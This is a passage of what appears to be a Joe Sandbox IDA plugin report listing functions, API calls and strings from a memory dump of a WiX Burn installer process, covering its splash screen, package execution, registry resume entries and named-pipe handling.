Instruction ID: 406a675e6a39420a296028d077b0b5ed820f1ea5d6500c67804c8fb1c25c709c
Opcode Fuzzy Hash: 70a26b0454369493cc914731368373bdd2b14084884a76ceb1ba6e1e38ac8fff
Instruction Fuzzy Hash: 7FC1C172901619AADF119F68C885BFE3AB8FF04714F144179FE09EE341EB789950CBA1

Function 008E8134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 008E8161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 008E817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008E821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,008EB518,00000000), ref: 008E825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008E82B1
CompareStringW.KERNEL32(0000007F,00000000,008EB518,000000FF,true,000000FF), ref: 008E82CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008E8307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 008E844B

Strings

upgrade, xrefs: 008E8211
version, xrefs: 008E8250, 008E82F9
true, xrefs: 008E82C1
type, xrefs: 008E81A7
exclusive, xrefs: 008E82A3
apuputil.cpp, xrefs: 008E836E
http://appsyndication.org/2006/appsyn, xrefs: 008E8154
enclosure, xrefs: 008E8439
application, xrefs: 008E816E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: a24d283a5a083dd488804af8adef95bb82e199b01312acae9c2705d1fe736111
Instruction ID: 20d97524baff1a0fa1abb351396ec7152683da760a02b9870f742a1edafcf4e6
Opcode Fuzzy Hash: a24d283a5a083dd488804af8adef95bb82e199b01312acae9c2705d1fe736111
Instruction Fuzzy Hash: D0B19D31504686EFDB218F59CC81F5A77A6FB46734F214659F929EB2D1EB70E840CB04

Function 008BE3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008BE2AF: LoadBitmapW.USER32(?,00000001), ref: 008BE2E5
Part of subcall function 008BE2AF: GetLastError.KERNEL32 ref: 008BE2F1

LoadCursorW.USER32(00000000,00007F00), ref: 008BE429
RegisterClassW.USER32(?), ref: 008BE43D
GetLastError.KERNEL32 ref: 008BE448
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 008BE54D
DeleteObject.GDI32(00000000), ref: 008BE55C

Strings

Failed to register window., xrefs: 008BE476
splashscreen.cpp, xrefs: 008BE46C, 008BE4D5
Unexpected return value from message pump., xrefs: 008BE537
WixBurnSplashScreen, xrefs: 008BE436, 008BE548
Failed to create window., xrefs: 008BE4DF
Failed to load splash screen., xrefs: 008BE401

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: 80c107fc46da8a129d5ebdd8fdb6be08cc13b1a2e4c90c1d12c8037160812b83
Instruction ID: 0ea03827c83afe11bb326a04b6a73db75e31c966c239297e3cc9c9f6359cdd5c
Opcode Fuzzy Hash: 80c107fc46da8a129d5ebdd8fdb6be08cc13b1a2e4c90c1d12c8037160812b83
Instruction Fuzzy Hash: B841827290065ABFEB219BE4DD49AEFBBB9FF04714F100125FA11EA350E774AD048B91

Function 008C9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,008CBC85,00000001), ref: 008C9E46
GetLastError.KERNEL32(?,008CBC85,00000001), ref: 008C9FB6
GetExitCodeThread.KERNEL32(00000001,00000000,?,008CBC85,00000001), ref: 008C9FF6
GetLastError.KERNEL32(?,008CBC85,00000001), ref: 008CA000

Strings

Failed to execute MSI package., xrefs: 008C9EA6
Failed to get cache thread exit code., xrefs: 008CA031
Failed to execute compatible package action., xrefs: 008C9F73
Failed to execute dependency action., xrefs: 008C9F36
Failed to execute package provider registration action., xrefs: 008C9F17
apply.cpp, xrefs: 008C9FDD, 008CA027
Failed to execute MSP package., xrefs: 008C9ECB
Failed to execute MSU package., xrefs: 008C9EFB
Invalid execute action., xrefs: 008CA056
Failed to execute EXE package., xrefs: 008C9E7D
Failed to load compatible package on per-machine package., xrefs: 008C9F5C
Cache thread exited unexpectedly., xrefs: 008CA047
Failed to wait for cache check-point., xrefs: 008C9FE7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 3558fe9b6ff16a3474baac107abbab53093e92704bc721c769de2406c46a5155
Instruction ID: d2d95879acb12e641ccf1b18a7e537d1a0643707b2bb479f9144d8655079bcf8
Opcode Fuzzy Hash: 3558fe9b6ff16a3474baac107abbab53093e92704bc721c769de2406c46a5155
Instruction Fuzzy Hash: E7716A71A0122AEBDB14CFA8C945FBE7BB8FB44B54F1141ADF940E7240D674EE009BA1

Function 008AF210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 008E3B3E

RegCloseKey.ADVAPI32(00000000,?,008F0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 008AF440

Part of subcall function 008E14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,008AF28D,008F0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008E14BB

Strings

Installed, xrefs: 008AF2A5
Failed to format resume command line for RunOnce., xrefs: 008AF2F9
burn.runonce, xrefs: 008AF2DA
Resume, xrefs: 008AF282
registration.cpp, xrefs: 008AF3C4, 008AF412
Failed to write resume command line value., xrefs: 008AF35D
Failed to write run key value., xrefs: 008AF33B
Failed to delete resume command line value., xrefs: 008AF41C
Failed to create run key., xrefs: 008AF31D
Failed to write Installed value., xrefs: 008AF2B6
"%ls" /%ls, xrefs: 008AF2E5
Failed to delete run key value., xrefs: 008AF3CE
Failed to write Resume value., xrefs: 008AF293
BundleResumeCommandLine, xrefs: 008AF348, 008AF3DB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
API String ID: 2348918689-2631711097
Opcode ID: 3f96ff14d7d068ed08ecda8e70e01705fd47815a73787dc9fc1077f241a1ecba
Instruction ID: 1f5095399ea276685e562201da01d91dad4bf4e12f1246917cba03e39811c0fc
Opcode Fuzzy Hash: 3f96ff14d7d068ed08ecda8e70e01705fd47815a73787dc9fc1077f241a1ecba
Instruction Fuzzy Hash: 86510332D4126AFBEF219AE48C0AABEB664FF06714F100135FB10F6652D77899109BC5

Function 008CCC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(76228FB0,00000002,00000000), ref: 008CCC9D

Part of subcall function 008B4D8D: UuidCreate.RPCRT4(?), ref: 008B4DC0

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,008C2401,?,?,00000000,?,?,?), ref: 008CCD7B
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 008CCD85
GetProcessId.KERNEL32(008C2401,?,?,00000000,?,?,?,?), ref: 008CCDBD

Part of subcall function 008B54DC: lstrlenW.KERNEL32(?,?,00000000,?,008EB500,?,00000000,?,008A452F,?,008EB500), ref: 008B54FD
Part of subcall function 008B54DC: GetCurrentProcessId.KERNEL32(?,008A452F,?,008EB500), ref: 008B5508
Part of subcall function 008B54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,008A452F,?,008EB500), ref: 008B553F
Part of subcall function 008B54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,008A452F,?,008EB500), ref: 008B5554
Part of subcall function 008B54DC: GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B555E
Part of subcall function 008B54DC: Sleep.KERNEL32(00000064,?,008A452F,?,008EB500), ref: 008B5593
Part of subcall function 008B54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55B6
Part of subcall function 008B54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55D1
Part of subcall function 008B54DC: WriteFile.KERNEL32(?,008A452F,008EB500,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55EC
Part of subcall function 008B54DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,008A452F,?,008EB500), ref: 008B5607

Part of subcall function 008E0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,008A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008E0A38
Part of subcall function 008E0A28: GetLastError.KERNEL32(?,?,008A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008E0A46

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,008CCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 008CCE41
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,008CCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 008CCE50
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,008CCBEF,?,?,?,?,?,00000000,?,?,?), ref: 008CCE67

Strings

Failed to allocate embedded command., xrefs: 008CCD54
%ls -%ls %ls %ls %u, xrefs: 008CCD40
Failed to wait for embedded process to connect to pipe., xrefs: 008CCDDF
Failed to create embedded process at path: %ls, xrefs: 008CCDB3
Failed to create embedded pipe., xrefs: 008CCD27
Failed to wait for embedded executable: %ls, xrefs: 008CCE24
Failed to create embedded pipe name and client token., xrefs: 008CCD00
embedded.cpp, xrefs: 008CCDA6
Failed to process messages from embedded message., xrefs: 008CCE04
burn.embedded, xrefs: 008CCD38

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: 976b58d078cea959d2b0903453dcee1c8c178adbff10196e130f972ed0512c2b
Instruction ID: 47c7c86c121f5e666cfdbb0cebbd33ca7630153c92cbaea20201f82e8e0cb3c0
Opcode Fuzzy Hash: 976b58d078cea959d2b0903453dcee1c8c178adbff10196e130f972ed0512c2b
Instruction Fuzzy Hash: 8D514B72D4022EBBDF229A98DC46FEEBBB8FB04710F100125FA05F6291D7749A409BD1

Function 008AECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 008AEE4C

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

SysFreeString.OLEAUT32(?), ref: 008AEE04

Strings

Failed to get @Path., xrefs: 008AEE95
Failed to get @Regid., xrefs: 008AEE9F
Regid, xrefs: 008AED9A
Failed to get @Filename., xrefs: 008AEEA9
Filename, xrefs: 008AED7F
Failed to allocate memory for software tag structs., xrefs: 008AED4B
registration.cpp, xrefs: 008AED41
Failed to get next node., xrefs: 008AEEB3
Failed to convert SoftwareTag text to UTF-8, xrefs: 008AEE81
SoftwareTag, xrefs: 008AECCD
Failed to get SoftwareTag text., xrefs: 008AEE8B
Failed to get software tag count., xrefs: 008AED13
Path, xrefs: 008AEDB2
Failed to select software tag nodes., xrefs: 008AECEE
`Dv, xrefs: 008AEE04, 008AEE4C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`Dv$registration.cpp
API String ID: 336948655-2733233106
Opcode ID: 3f1a2be5d6749c4d68a16075fbebf16bf07c7fe90a51aef8b5ce0b8d3f309290
Instruction ID: bc7fb635736bbf644ccdb8922521ea33a91c02b26bcd6ac196d786db1df0adb1
Opcode Fuzzy Hash: 3f1a2be5d6749c4d68a16075fbebf16bf07c7fe90a51aef8b5ce0b8d3f309290
Instruction Fuzzy Hash: 7C518131E0172AFBEB15DFA9C885EAEBBA4FF06710B104569B911EB640C775DE108790

Function 008E7F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,008E8468,00000001,?), ref: 008E7F9E
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,008E8468,00000001,?), ref: 008E7FB9
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,008E8468,00000001,?), ref: 008E7FD4
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,008E8468,00000001,?), ref: 008E8040
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,008E8468,00000001,?), ref: 008E8064
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,008E8468,00000001,?), ref: 008E8088
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,008E8468,00000001,?), ref: 008E80A8
lstrlenW.KERNEL32(006C0064,?,008E8468,00000001,?), ref: 008E80C3

Strings

sha256, xrefs: 008E809F
digest, xrefs: 008E7FB0
name, xrefs: 008E7FCB
apuputil.cpp, xrefs: 008E80DB
algorithm, xrefs: 008E8037
http://appsyndication.org/2006/appsyn, xrefs: 008E7F91
msi.dll, xrefs: 008E7F98
md5, xrefs: 008E805B
sha1, xrefs: 008E807F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 257ea560914a2bccac38cdf0c32eb14c62549659ed9958df1b366132f26beac3
Instruction ID: a19b319e012abc7064531e4a879eeaac2629e5be7e40ceeacc24359ae4e50cf3
Opcode Fuzzy Hash: 257ea560914a2bccac38cdf0c32eb14c62549659ed9958df1b366132f26beac3
Instruction Fuzzy Hash: BA518231688652FBDB205F55CC85F1A7A66FB16734F204314F638EE2E1CBB1E8548B90

Function 008AA03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008AA0B6

Strings

Failed to copy upgrade code., xrefs: 008AA116
Product or related product not found: %ls, xrefs: 008AA1A1
AssignmentType, xrefs: 008AA091
State, xrefs: 008AA098
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 008AA24F
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 008AA148
Failed to format GUID string., xrefs: 008AA0C1
Failed to get product info., xrefs: 008AA1E3
VersionString, xrefs: 008AA0A6, 008AA131, 008AA147, 008AA15B, 008AA174, 008AA188
Unsupported product search type: %u, xrefs: 008AA07E
Failed to change value type., xrefs: 008AA21D
Failed to enumerate related products for upgrade code., xrefs: 008AA0F1
Language, xrefs: 008AA09F
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 008AA175
Failed to set variable., xrefs: 008AA23C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 354bf3f04aa3fa699216b11493b6a74543b0b29cab5cdcd2647927487cf914d1
Instruction ID: 56099c72d4d17f4f11a41ec365ccf6518c0468a1540d1600e45bba0ec645edcc
Opcode Fuzzy Hash: 354bf3f04aa3fa699216b11493b6a74543b0b29cab5cdcd2647927487cf914d1
Instruction Fuzzy Hash: 08610332D40159FBEB299AA9CC45EAE7B78FB07714F200065F901FAA41D336DE10DB92

Function 008B4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 008B4B84
GetLastError.KERNEL32 ref: 008B4B92
Sleep.KERNEL32(00000064), ref: 008B4BB6

Strings

\\.\pipe\%ls, xrefs: 008B4B3C
Failed to allocate name of parent pipe., xrefs: 008B4B50
Failed to verify parent pipe: %ls, xrefs: 008B4BFE
Failed to open companion process with PID: %u, xrefs: 008B4CDE
Failed to allocate name of parent cache pipe., xrefs: 008B4C2B
feclient.dll, xrefs: 008B4BE9, 008B4C84, 008B4C98, 008B4CDC
\\.\pipe\%ls.Cache, xrefs: 008B4C17
pipe.cpp, xrefs: 008B4BCF, 008B4CD2
Failed to open parent pipe: %ls, xrefs: 008B4BDC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: 74073d116a824ac40f3d09041503b92b1a060a13e9a8b6e488f16d8942a81f26
Instruction ID: be0c3bbfdd6fba5433c38d77532a441b3b30ceee8bb789482be42f88193acbad
Opcode Fuzzy Hash: 74073d116a824ac40f3d09041503b92b1a060a13e9a8b6e488f16d8942a81f26
Instruction Fuzzy Hash: 57412436981636BBDB2116E48D07FAABA64FF11B30F111221FF10FA392D779AD0086D5

Function 008AF585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,008B04DF,InstallerVersion,InstallerVersion,00000000,008B04DF,InstallerName,InstallerName,00000000,008B04DF,Date,InstalledDate,00000000,008B04DF,LogonUser), ref: 008AF733

Part of subcall function 008E14F4: RegSetValueExW.ADVAPI32(00020006,008F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,008AF335,00000000,?,00020006), ref: 008E1527

Strings

Failed to get the formatted key path for update registration., xrefs: 008AF5A7
PackageVersion, xrefs: 008AF61F, 008AF632
InstallerVersion, xrefs: 008AF701, 008AF706, 008AF707, 008AF717
ReleaseType, xrefs: 008AF68A, 008AF68F, 008AF69E
InstalledDate, xrefs: 008AF6C4, 008AF6DD
Failed to write %ls value., xrefs: 008AF71C
InstalledBy, xrefs: 008AF6A4, 008AF6BD
ThisVersionInstalled, xrefs: 008AF5DF, 008AF5F2
PackageName, xrefs: 008AF5FF, 008AF612
Date, xrefs: 008AF6C9
Failed to create the key for update registration., xrefs: 008AF5D3
PublishingGroup, xrefs: 008AF667, 008AF67A
Publisher, xrefs: 008AF63F, 008AF652
LogonUser, xrefs: 008AF6A9
InstallerName, xrefs: 008AF6E4, 008AF6E9, 008AF6EA, 008AF6FA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: 545e17eaec8c4cff9467d127e8d99ce0143d07007323a6b4fd0471ef4672a750
Instruction ID: 8596d996bf115c136af7e4d046244edb6c675ffe4c6fc5685b6bb863a4fd8a05
Opcode Fuzzy Hash: 545e17eaec8c4cff9467d127e8d99ce0143d07007323a6b4fd0471ef4672a750
Instruction Fuzzy Hash: 0C41C832E406AEB7EF2366E4CC02EAE7A65FB13714B110160FB10F6763D7749E509689

Function 008BE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 008BE7FF
RegisterClassW.USER32(?), ref: 008BE82B
GetLastError.KERNEL32 ref: 008BE836
CreateWindowExW.USER32(00000080,008F9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 008BE89D
GetLastError.KERNEL32 ref: 008BE8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 008BE945

Strings

Failed to register window., xrefs: 008BE864
uithread.cpp, xrefs: 008BE85A, 008BE8CB
Unexpected return value from message pump., xrefs: 008BE930
WixBurnMessageWindow, xrefs: 008BE824, 008BE940
Failed to create window., xrefs: 008BE8D5

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 4f449a7e445f7170ca2b51f6e2e62f03991f02021475397332962537a7848d54
Instruction ID: 6a0e6cc6d57499c4e4d7a94809f591d91222c4a9d5e646db89a4c22ea843aba3
